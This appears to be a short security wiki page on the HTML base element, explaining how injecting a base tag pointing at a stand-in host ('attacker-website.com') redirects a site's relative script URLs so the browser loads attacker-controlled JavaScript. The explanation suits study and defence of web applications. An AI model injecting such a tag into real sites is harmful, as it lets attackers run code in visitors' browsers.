base

The HTML <base> element specifies the base URL to use for all relative URLs in a document.

Note: If multiple <base> elements are used, only the first href and first target are obeyed — all others are ignored.

Relative URL redirection

<base> tag injection allows you to redirect relative url to the attacker host. For example, if the vulnerable site includes a script:

<script src="/assets/some-script.js"></script>

so, if you inject before the relative remote script:

<base href="https://attacker-website.com">

the browser will request https://attacker-website.com/assets/some-script.js.

Last updated 2 years ago